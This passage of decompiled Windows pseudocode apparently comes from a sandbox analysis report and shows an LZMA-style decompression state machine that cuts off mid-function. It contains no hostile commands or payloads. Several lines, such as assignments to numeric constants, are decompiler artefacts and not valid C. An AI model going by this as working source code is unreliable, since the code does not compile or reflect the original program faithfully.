						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004068EF))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
